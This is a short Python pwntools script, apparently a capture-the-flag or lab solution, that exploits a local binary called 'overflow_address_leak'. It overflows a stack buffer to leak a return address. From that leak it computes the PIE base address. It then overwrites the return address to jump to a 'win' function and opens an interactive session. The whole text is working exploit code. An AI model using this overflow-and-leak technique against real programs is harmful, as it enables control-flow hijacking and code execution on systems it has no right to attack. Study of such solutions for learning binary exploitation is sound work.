from pwn import * filename = './overflow_address_leak' elf = ELF(filename) def run_once(): p = process(filename) ### Between the start of the buffer and the return address data = b'a'*0x10 data += b'c'*8 ## overflow rbp p.readuntil(b'dataz: ') p.send(data) p.readuntil(b'said: ') p.readuntil(data) y = p.readline().rstrip() y += b'\x00'*(8-len(y)) print(y) print(len(y)) leak = u64(y) print(hex(leak)) elf.address = leak - 0x12ec ## Now we have the base address. We know where win is p.readuntil(b'dataz: ') data = b'a'*0x10 data += b'c'*8 data += p64(elf.symbols['win']) p.send(data) p.interactive() run_once()